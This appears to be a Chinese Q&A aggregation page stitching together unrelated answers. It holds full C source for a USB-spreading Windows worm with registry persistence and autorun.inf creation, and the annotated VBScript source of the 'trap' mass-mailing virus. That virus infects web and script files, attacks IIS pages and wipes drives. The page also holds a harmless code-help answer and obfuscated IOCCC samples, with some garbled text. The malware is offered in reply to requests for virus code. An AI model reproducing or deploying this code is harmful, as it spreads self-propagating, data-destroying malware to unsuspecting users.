㈠ 用C語言編寫的病毒代碼
一個c病毒源代碼
#include <windows.h>
#include <Shlwapi.h>
#include <fstream.h>
#include <TlHelp32.h>
#include <Dbt.h>
#pragma comment(lib,"shlwapi.lib")
#define TIMER 1//計時器
//function
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);//窗口過程
//獲取盤符
TCHAR FirstDriveFromMask (ULONG unitmask);
//病毒從U盤啟動時用到的函數
BOOL FileExist(TCHAR *path);//測試一個文件是否存在
BOOL GetSelfPath(TCHAR *path);//Get the virus's path
//BOOL FindU(TCHAR *u);//check whether u exist, u[2]
BOOL GetSysPath(TCHAR *path);//得到系統路徑
BOOL CopyToSysAndSet(HWND hwnd);//復制自身到系統目錄和設置
BOOL SetFileAttrib(TCHAR *path);//設置path所指文件的屬性
BOOL RegAutoRun(TCHAR *path);//修改注冊表,實現自啟動
//從C盤啟動時用到函數
BOOL CopyToUAndSet();//復制自己到U盤
BOOL CreateAutoRunFile(TCHAR *path);//在U盤下生成autorun.inf文件
BOOL FindSelf();//測試自己是否在已經執行了
//global variable
TCHAR szExePath[MAX_PATH];//the virus's path
TCHAR U[2];//保存U盤的盤符
TCHAR szSysPath[MAX_PATH];//system path
//constant
const TCHAR *szExeName="bbbbb.exe";
const TCHAR *szSysName="aaaaa.exe";
const TCHAR *szAutoRunFile="AutoRun.inf";
int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance,
PSTR szCmdLine, int iCmdShow)
{
static TCHAR szAppName[]=TEXT ("UUUUUU");
HWND hwnd;
MSG msg;
WNDCLASS wndclass;
wndclass.style =0;
wndclass.lpfnWndProc =WndProc;
wndclass.cbClsExtra =0;
wndclass.cbWndExtra =0;
wndclass.hInstance =hInstance;
wndclass.hIcon =0;
wndclass.hCursor =0;
wndclass.hbrBackground =0;
wndclass.lpszMenuName =NULL;
wndclass.lpszClassName =szAppName;
if (!RegisterClass (&wndclass))
{
MessageBox (NULL,TEXT("Program requires Windows NT!"),
szAppName, MB_ICONERROR);
return 0;
}
hwnd = CreateWindow (szAppName, NULL,
WS_DISABLED,
0, 0,
0, 0,
NULL, NULL, hInstance, NULL);
while (GetMessage(&msg, NULL, 0, 0))
{
TranslateMessage (&msg);
DispatchMessage (&msg);
}
return msg.wParam;
}
LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam)
{
PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam;
switch(wParam)
{
case DBT_DEVICEARRIVAL: //插入
if (lpdb -> dbch_devicetype == DBT_DEVTYP_VOLUME)
{
PDEV_BROADCAST_VOLUME lpdbv = (PDEV_BROADCAST_VOLUME)lpdb;
U[0]=FirstDriveFromMask(lpdbv ->dbcv_unitmask);//得到u盤盤符
//MessageBox(0,U,"Notice!",MB_OK);
CopyToUAndSet();//拷到u盤
}
break;
case DBT_DEVICEREMOVECOMPLETE: //設備刪除
break;
}
return LRESULT();
}
LRESULT CALLBACK WndProc (HWND hwnd, UINT message, WPARAM wParam,LPARAM lParam)
{
switch(message)
{
case WM_Create: //處理一些要下面要用到的全局變數
U[1]=':';
GetSysPath(szSysPath);//得到系統路徑
SetTimer(hwnd,TIMER,5000,0);//啟動計時器
GetSelfPath(szExePath);//得到自身的路徑
return 0;
case WM_TIMER: //timer message
if(szExePath[0]==szSysPath[0]) //如果是系統盤啟動的
SendMessage(hwnd,WM_DEVICECHANGE,0,0);//檢測有沒有插入設備消息
else
{
CopyToSysAndSet(hwnd);//拷到系統盤並自啟動
}
return 0;
case WM_DEVICECHANGE:
OnDeviceChange(hwnd,wParam,lParam);
return 0;
case WM_DESTROY:
KillTimer(hwnd,TIMER);
PostQuitMessage(0);
return 0;
}
return DefWindowProc(hwnd, message, wParam, lParam);
}
TCHAR FirstDriveFromMask(ULONG unitmask)
{
char i;
for (i = 0; i < 26; ++i)
{
if (unitmask & 0x1)//看該驅動器的狀態是否發生了變化
break;
unitmask = unitmask >> 1;
}
return (i + 'A');
}
BOOL GetSelfPath(TCHAR *path)
{
if(GetMoleFileName(NULL,path,MAX_PATH))//得到程序自身的目錄
{
return TRUE;
}
else
return FALSE;
}
BOOL GetSysPath(TCHAR *path)
{
return GetSystemDirectory(path,MAX_PATH);//得到系統路徑
}
BOOL CopyToSysAndSet(HWND hwnd)
{
TCHAR szPath[MAX_PATH];
lstrcpy(szPath,szSysPath);
lstrcat(szPath,"\\");
lstrcat(szPath,szSysName);//得到復制到系統目錄的完整目錄
if(!FileExist(szPath))//檢測系統目錄是否已經存在復制的文件
{
CopyFile(szExePath,szPath,FALSE);
RegAutoRun(szPath);
return SetFileAttrib(szPath);
}
else
{
if(!FindSelf())//檢測自己有沒有運行
{
//MessageBox(0,szExePath,szPath,MB_OK);
WinExec(szPath,SW_HIDE);//沒有就執行
SendMessage(hwnd,WM_CLOSE,0,0);//結束自己
}
}
return FALSE;
}
BOOL FileExist(TCHAR *path)//檢測PATH所指的路徑的文件是否存在
{
int result;
result=PathFileExists(path);
if(result==1)
return TRUE;
else
return FALSE;
}
BOOL SetFileAttrib(TCHAR *path)
{
return SetFileAttributes(path,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
}
BOOL RegAutoRun(TCHAR *path)//修改注冊表實現自啟動
{
HKEY hkey;
DWORD v=0;
RegOpenKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",&hkey);
RegSetValueEx(hkey,"NoDriveTypeAutoRun",0,REG_DWORD,(LPBYTE)&v,sizeof(DWORD));
if(RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Run",
&hkey)==ERROR_SUCCESS)
{
RegSetValueEx(hkey,szSysName,0,REG_SZ,(BYTE*)path,lstrlen(path));
RegCloseKey(hkey);
return TRUE;
}
else
return FALSE;
}
BOOL CopyToUAndSet()
{
TCHAR szPath[MAX_PATH];
lstrcpy(szPath,U);
lstrcat(szPath,"\\");
lstrcat(szPath,szExeName);//得到指向U盤的完整目錄
TCHAR szAutoFile[MAX_PATH];
lstrcpy(szAutoFile,U);
lstrcat(szAutoFile,"\\");
lstrcat(szAutoFile,szAutoRunFile);
if(!FileExist(szAutoFile))
{
CreateAutoRunFile(szAutoFile);
SetFileAttrib(szAutoFile);
}
if(!FileExist(szPath))
{
CopyFile(szExePath,szPath,FALSE);
return SetFileAttrib(szPath);
}
return FALSE;
}
BOOL CreateAutoRunFile(TCHAR *path) //在U盤下創建一個autorun.inf文件
{
ofstream fout;
fout.open(path);
if(fout)
{
fout<<"[AutoRun]"<<endl;
fout<<"open="<<szExeName<<" e"<<endl;
fout<<"shellexecute="<<szExeName<<" e"<<endl;
fout<<"shell\\Auto\\command="<<szExeName<<" e"<<endl;
fout<<"shell=Auto"<<endl;
fout.close();
return TRUE;
}
return FALSE;
}
BOOL FindSelf(){
PROCESSENTRY32 pe;
HANDLE hShot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
pe.dwSize=sizeof(PROCESSENTRY32);
if(Process32First(hShot,&pe)){
do{
if(lstrcmp(pe.szExeFile,szSysName)==0)
{
CloseHandle(hShot);
return TRUE;
}
}while(Process32Next(hShot,&pe));
}
CloseHandle(hShot);
return FALSE;
} 隱藏窗口:ShowWindow(false); (#include <windows.h>)
將程序暫停一秒後繼續執行:sleep(1000); (同上)
刪除文件:system("del 文件的路徑");
運行文件:system("文件的路徑");
system函數(#include <iostream>)
復制文件:詳見remove函數(#include <process.h>)
-----------------------------------------------------------
一個不錯的病毒完整源代碼
#include <windows.h>
#include <Shlwapi.h>
#include <fstream.h>
#include <TlHelp32.h>
#include <Dbt.h>
#pragma comment(lib,"shlwapi.lib")
#define TIMER 1//計時器
//function
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);//窗口過程
//獲取盤符
TCHAR FirstDriveFromMask (ULONG unitmask);
㈡ 一段特別詭異的C語言代碼 求大神告知
你發的這段程序,int flag放到你標記的兩個位置都是一樣的。但是我覺得應該放到下面的這個位置更合理:
#defineA(X)((t[X]-'0'做禪))
intmain()
{
inti,j,N,m;
chart[3];
// intflag=0;
scanf("%d",&m);
for(j=1;j<=m;j++)
{
intflag=0;//應該放到這里來!!!!
scanf("%d",&N);
printf("Case%d: ",j);
for(i=100;i<1000;i++)
{
sprintf(t,"%d",i);
if((A(0)+A(1))*2+A(2)==N)
{
printf("%c%c%c%c%c ",t[0],t[1],t[2],t[1],t[0]);
flag++;
}
}
for(i=100;i<1000;i++)
{
sprintf(t,"%d",i);
if((A(0)+A(1)+A(2))*2==N)
{
printf("%c%c%c%c%c%c ",t[0],t[1],t[2],t[2],t[1],t[0]);
flag++;
}
}
if(flag==0)printf("-1 ");
}
}
還可以優化為以下程序:
#defineA(X)((t[X]-'0'))
intmain()
{
int純神塵i,j,N,m,flag;
chart[3];
scanf("%d",&m);
for(j=1;j<瞎橘=m;j++)
{
printf("Case%d: ",j);
flag=0;
scanf("%d",&N);
for(i=100;i<1000;i++)
{
sprintf(t,"%d",i);
if((A(0)+A(1))*2+A(2)==N||(A(0)+A(1)+A(2))*2==N)
{
printf("%c%c%c",t[0],t[1],t[2]);
if((A(0)+A(1)+A(2))*2==N)printf("%c",t[2]);
printf("%c%c ",t[1],t[0]);
flag++;
}
}
if(flag==0)printf("-1 ");
}
}
㈢ 給個C語言病毒代碼.....要復制的....越長越好
下面就對「陷阱」的發作過程和源代碼作詳細的揭密。
病毒具有自身加密能力(使用 JavaScript 編碼技術),使得普通用戶無法看到病毒原碼,但在被感染 VBS 文件中並沒有加密,於是作為一個入口點,我非常輕松地得到所有源碼。叢賀畢
'@ thank you! make use of other person to get rid of an enemy, trap _2001
'這句話的意思可能是「借刀殺人」,然後是病毒名稱「陷阱」
on error resume next
dim vbscr, fso,w1,w2,MSWKEY,HCUW,Code_Str, Vbs_Str, Js_Str
dim defpath, smailc, MAX_SIZE
dim whb(), title(10)
smailc = 4
Redim whb(smailc) 』白宮相關人員郵件名單
whb(0) = "[email protected]"
whb(1) = "[email protected] "
whb(2) = "[email protected]"滲芹
whb(3) = "[email protected]"
'發送郵件的主題
title(0) = "Thanks for helping me!"
title(1) = "The police are investigating the robbery"
title(2) = "an application for a job "
title(3) = "The aspects of an application process pertinent to OSI"
title(4) = "What a pleasant weather. Why not go out for a walk?"
title(5) = "These countries have gone / been through too many wars"
title(6) = "We've fixed on the 17th of April for the wedding"
title(7) = "The wind failed and the sea returned to calmness."
title(8) = "the sitting is open!"
title(9) = ""
defpath = "C:\Readme.html" ' 病毒文件
MAX_SIZE = 100000 ' 定義傳染文件的最大尺寸
MSWKEY = "HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Windows\"
HCUW = "HKEY_CURRENT_USER\Software\Microsoft\拍寬WAB\"
main
sub main() '主程序
on error resume next
dim w_s
w_s= WScript.ScriptFullName '得到病毒文件本身的路徑
if w_s = "" then
Err.Clear
set fso = CreateObject("Scripting.FileSystemObject") '創建文件系統對象
if getErr then '辨認病毒狀態
Randomize '初始化隨機種子
ra = int(rnd() * 7) '產生隨機數
doucment.write title(ra) ' 寫隨機內容
ExecuteMail '執行郵件狀態時的程序
else
ExecutePage '執行 WEB 頁狀態時的程序
end if
else
ExecuteVbs '執行 VBS 文件狀態時的程序
end if
end sub
Function getErr() 忽略錯誤
if Err.number<>0 then
getErr=true
Err.Clear
else
getErr=false
end if
end function
sub ExecutePage() 'WEB 頁狀態時的程序
on error resume next
dim Html_Str, adi, wdf, wdf2,wdf3,wdsf, wdsf2, vf
Vbs_Str = GetScriptCode("vbscript") '得到 VBScript 代碼
Js_Str = GetJavaScript() ' 得到 Javascript 代碼
Code_Str = MakeScript(encrypt(Vbs_str),true) '得到已加密過的腳本代碼
Html_Str = MakeHtml(encrypt(Vbs_str), true) '得到已加密的完整HTML代碼
Gf
'定義病毒文件的路徑
wdsf = w2 & "Mdm.vbs"
wdsf2 = w1 & "Profile.vbs"
wdf = w2 & "user.dll" ' 注意 wdf 和 wdf3 兩個文件非常迷惑人
wdf2 = w2 & "Readme.html"
wdf3 = w2 & "system.dll"
'創建病毒文件
set vf = fso.OpenTextFile (wdf, 2, true)
vf.write Vbs_Str
vf.close
set vf = fso.OpenTextFile (wdsf, 2, true)
vf.write Vbs_Str
vf.close
set vf = fso.OpenTextFile (wdsf2, 2, true)
vf.Write Vbs_Str
vf.close
set vf = fso.OpenTextFile (wdf2, 2, true)
vf.write Html_Str
vf.close
set vf = fso.OpenTextFile (wdf3, 2, true)
vf.write Code_Str
vf.close
修改注冊表,讓病毒文件在每一次計算機啟動自動執行
Writereg MSWKEY & "CurrentVersion\Run\Mdm", wdsf, ""
Writereg MSWKEY & "CurrentVersion\RunServices\Profile", wdsf2, ""
SendMail ' 執行發送郵件程序
Hackpage ' 執行感染網站程序
set adi = fso.Drives
for each x in adi
if x.DrivesType = 2 or x.DrivesType = 3 then '遍歷所有本地硬碟和網路共享硬碟
call SearchHTML(x & "\") '執行文件感染程序
end if
next
if TestUser then '檢查用戶
Killhe 執行刪除文件操作
else
if Month(Date) & Day(Date) = "75" then '如系統時間為 7月5日
set vf = fso.OpenTextFile(w2 & "75.htm", 2,true) 』創建系統攻擊文件
vf.write MakeScript ("window.navigate ('c:/con/con');", false)
vf.close
Writereg MSWKEY & "CurrentVersion\Run\75", w2 & "75.htm", "" '自動啟動
window.navigate "c:/con/con" '立刻藍屏,利用 Windows BUG,能引起 Win9X 系統100%死機(即無法恢復的藍屏)
else '如不是7.5
if fso.FileExists(w2 & "75.htm") then fso.DeleteFile w2 & "75.htm" ' 刪除75.htm
end if
end if
if fso.FileExists(defpath) then fso.DeleteFile defpath ' 刪除 C:\Readme.html 病毒文件
end sub
sub ExecuteMail() '郵件狀態時執行的程序
on error resume next
Vbs_Str = GetScriptCode("vbscript")
Js_Str = GetJavaScript()
Set Stl = CreateObject("Scriptlet.TypeLib") '創建 TypeLib對象
with Stl
.Reset
.Path = defpath
.Doc = MakeHtml(encrypt(Vbs_str), true)
.Write() '創建 C:\Readme.html 文件
end with
window.open defpath, "trap", "width=1 height=1 menubar=no scrollbars=no toolbar=no" 打開會隱藏的窗口
end sub
sub ExecuteVbs() ' 同理,如病毒文件是 VBS 時所執行的程序
on error resume next
dim x, adi, wvbs, ws, vf
set fso = CreateObject("Scripting.FileSystemObject")
set wvbs = CreateObject("WScript.Shell")
Gf
wvbs.RegWrite MSWKEY & "Windows Scripting Host\Setings\Timeout", 0, "REG_DWORD"
set vf = fso.OpenTextFile (w2 & "system.dll", 1)
Code_Str = vf.ReadAll()
vf.close
Hackpage
SendMail
set adi = fso.Drives
for each x in adi
if x.DrivesType = 2 or x.DrivesType = 3 then
call SearchHTML(x & "\")
end if
next
if TestUser then Killhe
end sub
sub Gf() '得到系統路徑
w1=fso.GetSpecialFolder(0) & "\"
w2=fso.GetSpecialFolder(1) & "\"
end sub
function Readreg(key_str) '讀注冊表
set tmps = CreateObject("WScript.Shell")
Readreg = tmps.RegRead(key_str)
set tmps = Nothing
end function
function Writereg(key_str, Newvalue, vtype) '寫注冊表
set tmps = CreateObject("WScript.Shell")
if vtype="" then
tmps.RegWrite key_str, Newvalue
else
tmps.RegWrite key_str, Newvalue, vtype
end if
set tmps = Nothing
end function
function MakeHtml(Sbuffer, iHTML) '創建HTML 文件的完整代碼
dim ra
Randomize
ra = int(rnd() * 7)
MakeHtml="<" & "HTML><" & "HEAD><" & "TITLE>" & title(ra) & "</" & "TITLE><" & "/HEAD>" & _
"<BO" & "AD>" & vbcrlf & MakeScript(Sbuffer, iHTML) & vbcrlf & _
"<" & "/BOAD><" & "/HTML>"
end Function
function MakeScript(Codestr, iHTML) '此程序是病毒進行自我加密過程,較為復雜,不再描述
if iHTML then
dim DocuWrite
DocuWrite = "document.write('<'+" & "'SCRIPT Language=JavaScript>\n'+" & _
"jword" & "+'\n</'" & "+'SCRIPT>');"
DocuWrite = DocuWrite & vbcrlf & "document.write('<'+" & "'SCRIPT Language=VBScript>\n'+" & _
"nword" & "+'\n</'" & "+'SCRIPT>');"
MakeScript="<" & "SCRIPT Language=JavaScript>" & vbcrlf & "var jword = " & _
chr(34) & encrypt(Js_Str) & chr(34) & vbcrlf & "var nword = " & _
chr(34) & Codestr & chr(34) & vbcrlf & "nword = unescape(nword);" & vbcrlf & _
"jword = unescape(jword);" & vbcrlf & DocuWrite & vbcrlf & "</" & "SCRIPT>"
else
MakeScript= "<" & "SCRIPT Language=JavaScript>" & Codestr & "</" & "SCRIPT>"
end if
end function
function GetScriptCode(Languages) ' 得到不同腳本語言的代碼
dim soj
for each soj in document.scripts
if LCase(soj.Language) = Languages then
if Languages = "javascript" then
if len(soj.Text)> 200 then
else
GetScriptCode = soj.Text
exit function
end if
else
GetScriptCode = soj.Text
exit function
end if
end if
next
end function
function GetJavaScript()
GetJavaScript = GetScriptCode("javascript")
end function
function TestUser() '檢測用戶過程
on error resume next
dim keys(6), i, tmpStr, Wnet
'特定用戶關鍵詞
keys(0) = "white home"
keys(1) = "central intelligence agency"
keys(2) = "bush"
keys(3) = "american stock exchang"
keys(4) = "chief executive"
keys(5) = "usa"
TestUser = false
Set Wnet = CreateObject("WScript.Network") '創建網路對象
'下面一共3個循環,作用一樣,是檢查用戶的 Domain、用戶名和計算機名是否含有以上的5個關鍵詞語,一旦含有程序將返回」真」的條件,從而對這些用戶的文件進行瘋狂刪除。
tmpStr = LCase(Wnet.UserName) '
for i=0 to 4
if InStr(tmpStr, keys(i)) > 0 then
TestUser=true
exit function
end if
next
tmpStr = LCase(Wnet.ComputerName)
for i=0 to 4
if InStr(tmpStr, keys(i)) > 0 then
TestUser=true
exit function
end if
next
tmpStr = LCase(Wnet.UserDomain)
for i=0 to 4
if InStr(tmpStr, keys(i)) >0 then
TestUser=true
exit function
end if
next
Set Wnet = Nothing
end function
function SendMail() '發送文件過程
on error resume next
dim wab,ra,j, Oa, arrsm, eins, Eaec, fm, wreg, areg,at
'首先向 OutLook 地址簿發送帶能直接感染文件的已加密的病毒代碼和HTML 附件
主題是隨機的,此過程與「歡樂時光「類似,所以不再描述
Randomize
at=fso.GetSpecialFolder(1) & "\Readme.html"
set Oa = CreateObject("Outlook.Application")
set wab = Oa.GetNameSpace("MAPI")
for j = 1 to wab.AddressLists.Count
eins = wab.AddressLists(j)
wreg=Readreg (HCUW & eins)
if (wreg="") then wreg = 1
Eaec = eins.AddressEntries.Count
if (Eaec > Int(wreg)) then
for x = 1 to Eaec
arrsm = wab.AddressEntries(x)
areg = Readreg(HCUW & arrsm)
if (areg = "") then
set fm = wab.CreateItem(0)
with fm
ra = int(rnd() * 7)
.Recipients.Add arrsm
.Subject = title(ra)
.Body = title(ra)
.Attachments at
.Send
Writereg HCUW & arrsm, 1, "REG_DWORD"
end with
end if
next
end if
Writereg HCUW & eins, Eaec, ""
next
'下面是對指定的用戶無條件發送大量病毒郵件, 從這一點可看出病毒作者對美國政府的極度不滿。
for j = 1 to smailc
arrsm = whb(j)
set fm = wab.CreateItem(0)
ra = int(rnd() * 7)
with fm
.Recipients.Add arrsm
.Subject = title(ra)
.Body = title(ra)
.Send
end with
next
set Oa = Nothing
window.setTimeout "SendMail()", 5000 '每隔 5 秒種重復發送
end function
sub SearchHTML(Path) '搜索可傳染文件的過程
on error resume next
dim pfo, psfo, pf, ps, pfi, ext
if instr(Path, fso.GetSpecialFolder(2)) > 0 then exit sub
if Path <> "E:\" then exit sub
set pfo = fso.GetFolder(Path)
set psfo = pfo.SubFolders
for each ps in psfo
SearchHTML(ps.Path)
set pf = ps.Files
for each pfi in pf
ext = LCase(fso.GetExtensionName(pfi.Path))
if instr(ext, "htm") > 0 or ext = "plg" or ext = "asp" then '檢查文件的擴展名是否為 htm、html、plg 如是則檢查是否被感染,如未被感染則將已加密的病毒代碼插入文件頭,這樣文件一旦執行也會執行病毒代碼,而且不會影響原文件的正常執行。
if Code_Str<>"" then AddHead pfi.Path, pfi, 1
elseif ext= "vbs" then '如是 vbs 文件,則插入未加密的病毒代碼
AddHead pfi.Path,pfi, 2
end if
next
next
end sub
sub Killhe() '全盤刪除文件過程
on error resume next
dim codeText, ko,adi, kd, kh, ks,kf,kfs
codeText = "@ECHO OFF" & vbcrlf & "PATH " & w1 & "COMMAND" & vbcrlf &_
"DELTREE c:\" '將刪除C盤的命令插入Autoexec.bat 中,下次開機時,刪除整個硬碟,並沒有任何提示
set ko = fso.OpenTextFile("C:\Autoexec.bat", 8, true)
ko.Write vbcrlf & codeText
ko.Close
'接著立刻刪除其它盤的所有文件
set adi = fso.Drives
for each x in adi
if x.DrivesType = 2 then
set kd = fso.GetFolder(x & "\")
set kfs = kd.Files
for each kf in kfs
kf.Delete
next
set ks = kd.SubFolders
for each kh in ks
kh.Delete
next
end if
next
do while 1 '讓系統立刻死機
window.open ""
loop
end sub
sub Hackpage() ' 此過程是直接攻擊 Mircosoft IIS 伺服器主頁過程
dim fi
H = "C:\InetPut\wwwroot"
if fso.FolderExists(H) then
'判斷是否為網站,如是則將已加密的帶病毒代碼插入文件頭,從而直接傳染瀏覽該網站的用戶
set fi = fso.GetFile(H & "\index.htm")
AddHead H & "\index.htm",fi,1
end if
end sub
sub AddHead(Path, f, t) '此過程是病毒傳染文件具體過程
on error resume next
dim tso, buffer,sr
if f.size > MAX_SIZE then exit sub '傳染大小小於100K的文件
set tso = fso.OpenTextFile(Path, 1, true)
buffer = tso.ReadAll()
tso.close
if (t = 1) then
if UCase(Left(LTrim(buffer), 7)) <> "<SCRIPT" then
set tso = fso.OpenTextFile(Path, 2, true)
tso.Write Code_Str & vbcrlf & buffer '插入到文件頭
tso.close
end if
else
if mid(buffer, 3, 2) <> "'@" then
tso.close
sr=w2 & "user.dll"
if fso.FileExists(sr) then fso.CopyFile sr, Path
end if
end if
end sub
雖然病毒發作日已過但我們還是要小心提防病毒的變種出現。
㈣ 國際C語言混亂代碼大賽的代碼樣例
第21屆國際C語言混亂代碼大賽(IOCCC)正式發布了獲獎源代碼。IOCCC要求參賽者寫出最有創意且最讓人難以理解的C語言代碼,大小限制在4 kb以內,因此每位參賽者的作品都讓人印象深刻。獲勝者包括1名法國人,1名韓國人,5名美國人,1名比利時人,1名以色列人,1名英國人,4名日本人和1名中國人。
選取了幾個代表性作品大家共賞一下更可怕的是,它們都可以編譯通過!!!! #include <stdio.h>
#include <stdlib.h>
#define s(_)sizeof(_)
#define n void*
#define z(_)_,_,_
#define x (s*)__
#define y (s*)_
#define h C(y,y)
#define o &d
#define t() (p)
#define w(_)_,_
typedef n (*(*(*(*p)(n,n))(n,n))(n,n))(n,n);
typedef struct s { struct s* a ; struct s* UNUSED; } s;
typedef struct t { struct s* UNUSED; struct s* a ; } *t;
n __(n _,n __) { return _;}n _(n _,n __){return __; }
typedef unsigned char e;
#define _(_)((*_).a)
s*
w,
a={x ,x},
b={x ,y},
c={y,x},d={y,y};s l[]={&b,&d,w (w(w(w(w(w(&d)))))),w(&d),&c,&d,w(w(w(
&d))),&c,w(&b),&d,&a,z(&d),z(w (w(w(w(w(&d)))))),&b,&b,w(&d),&a,&b,w(&
d), z(w
(w( w(w
(&d))))),w(w(w(&d))), &b,&c,&d, &d,&a,&c ,w(w(&d)), &c,z(&b) ,w(&d),w(&a)
};s* C(s* a, s* b) {s* _=malloc(s(s));_(_)=a;_((t)_)=b;return _;}e k2=s(l
);p f(p
a,p b)
{ e k;s d;p v,r, q,i,C,c,u,g,m=t( )
_ ( _(_(w)));C=t() _(_(&l[fread(&k,s(e )
,s ( e),stdin)]));v =C(_,__);d=l[k=(e )
C ( k2,k)];c=(u=a( b,_),i=(t()_((t )
_ ( _(w))))(_,_(_(o)) ),(a(_(_((t)o)),(t( )
_ ( _((t)o)))(_,__) ))(b(_((t)_((t)o) )
, ( t()_((t)_((t)o))) (_,__)),_));{p a=t( )
_ ( (t)_(o));{p b= C(_,i(u(_,__),_) )
; { p u=C(_,(t()_(_(o) ))(_,__));_(_(_(w)) )
= ( s*)i(__,_(_( _(w))));r=b(m(c,_ )
,C ( m(_,(t()_(( t)_(_(w))))(_,__) )
, ( f)));v=b(_,v);i =b(a(_,__),_);g=(b )
( a(m(c(_,__),__ ),_),_);q=u(_((t )
_ ( o)),_)((t()_( (t)_(_(w))))((t( )
_ ( _((t)o)))(_(_((t )_(w))),(t()_(_((t )
_ ( w))))(_,__))( _,__),_)(_,__),_ )
;_ ( _((t)_(w))) = (s*)u(_((t)_(o)),_ )
( (t()_((t)_(_(w)))) (_,__),_)(_(_((t)o) )
,_ ( _((t)_(w))));} }_((t)_(_(w)))=(s* )
q ( a=(t()_((t)_(_(w))) )(_,__),_((t)_(_(w))) )
; fwrite((k=k,&k2) ,s(e),u(_,g)(s(e )
, ( e)s(s[s(s[s(s[s (s)])])])),stdout )
; fwrite((k2=k,&k) ,s(e),u(__,g)(s(e )
, ( e)s(s[s(s[s(s[s (s)])])])),stdout )
;_ ( _(_((t)w)))=(s*) u((t()_(_(_((t)w))) )
( _,__),_(_(_((t)w ))));_(_((t)_(w)) )
= ( s*)q(a(_(_((t) o)),_(_((t)_(w))) )
,_ ( _((t)_(w))));} _((t)_(_((t)w)))=(s* )
( t()_(_(_((t)w))) )(_((t)_(_((t)w)) )
,u ( (t()_((t)_(_(( t)w))))(_,__),_((t )
_ ( _((t)w)))));g =u((q=u(C(__,(t( )
_ ( _(_((t)w))))(_((t )_(_((t)w))),_)),_) )
( _,__),g);v=g( __,i(u(_,i(f,_) )
( _(_((t)o)),_( (t)_((t)o))),v) )
,r= q(_
,g( f,i
(v(f,(_(_(_(w)))=(s*)m,_)),r)));return q(_,v)(r(g(__,a),g(__,b)),r);}
int main
(){w=C(C(h,h),C(h,h));return printf((e*)f(_,_)(OK
,
^ Error
)) (運行生成更小的頭像代碼) /*++++[>i>n[t*/#include<stdio.h>/*2w0,1m2,]_<n+am+o>r>i>=>(['0n1'0)1;*/int/**/main(int/**/n,char**m){FILE*p,*q;intA,k,a,r,i/*#uinndcelfu_dset<rsitcdti_oa.nhs>i/_*/;char*d=P%d
%d40%d/**/
%d
�0wb+,b[1024],y[]=yuriyurarararayuruyuri*daijiken**akkari~n**/y*u*k/riin<ty(uyr)g,aur,arr[a1r2a82*y2*/u*r{uyu}riOcyurhiyua**rrar+*arayra*=yuruyurwiyuriyurara'rariayuruyuriyuriyu>rarararayuruy9uriyu3riyurar_aBrMaPrOaWy^?*]/f]`;hvroai<dp/f*i*s/<ii(f)a{tpguat<cahfaurh(+uf)a;f}vivn+tf/g*`*w/jmaa+i`ni(/***/i+k[>+b+i>++b++>l[rb;int/**/u;for(i=0;i<101;i++)y[i*2]^=~hktrvg~dmG*eoa+%squ#l2:(wn1l))v?wM353{/Y;lgcGp`vedllwudvOK`cct~[|ju{stkjalor(stwvnegtyogYURUYURI[i]^y[i*2+1]^4;/*!*/p=(n>1&&(m[1][0]-'-'||m[1][1]!='�'))?fopen(m[1],y+298):stdin;/*y/riynrt~(^w^)],]c+h+a+r+*+*[n>)+{>f+o<r<(-m]=<2<5<64;}-]-(m+;yry[rm*])/[**/q=(n<3||!(m[2][0]-'-'||m[2][1]))?stdout/*]{}[*/:fopen(m[2],d+14);if(!p||/*]<<*-]>y++>u>>+r>+u+++y>--u---r>++i+++<)<;[>-m-.>a-.-i.++n.>[(w)*/!q/**/)return+printf(Cannot open40%s40for40%sing
,m[!p?1:2],!p?/*o=82]5<<+(+3+1+&.(+m+-+1.)<)<|<|.6>4>-+(>m-&-1.9-2-)-|-|.28>-w-?-m.:>([28+*/read:writ);for(a=k=u=0;y[u];u=2+u){y[k++]=y[u];}if((a=fread(b,1,1024/*,mY/R*YR*/,p/*U*/)/*R*/)>/*U{*/2&&b/*Y*/[0]/*U*/=='P'&&4==/*y*r/y)r}*/sscanf(b,d,&k,&A,&i,&r)&&!(k-6&&k-5)&&r==255){u=A;if(n>3){/*]&<1<6<?<m.-+1>3>+:+.1>3+++.-m-)-;.u+=++.1<0<<;f<o<r<(.;<([m(=)/8*/u++;i++;}fprintf(q,d,k,u>>1,i>>1,r);u=k-5?8:4;k=3;}else/*]>*/{(u)=/*{p>>u>t>-]s>++(.yryr*/+(n+14>17)?8/4:8*5/4;}for(r=i=0;;){u*=6;u+=(n>3?1:0);if(y[u]&01)fputc(/*<g-e<t.c>h.ar-(-).)8+<1.>;+i.(<)<<)+{+i.f>([180*/1*(r),q);if(y[u]&16)k=A;if(y[u]&2)k--;if(i/*(^w^NAMORI;{I*/==a/*)*/){/**/i=a=(u)*11&255;if(1&&0>=(a=fread(b,1,1024,p))&&)]i>(w)-;}{/i-f-(-m--M1-0.)<{[8]==59/**/)break;i=0;}r=b[i++];u+=(/**>>*..</<<<)<[[;]**/+8&*(y+u))?(10-r?4:2):(y[u]&4)?(k?2:4):2;u=y[u/*49;7i(w)/;}y}ru=*ri[,mc]o;n}trientuuren(*/]-(int)'`';}fclose(p);k=+fclose(q);/*]<*.na/m*o{ri{d;^w^;}}^_^}}*/returnk--1+/*''-`*/(-/*}/*/0x01);{;{}};/*^w^*/;}
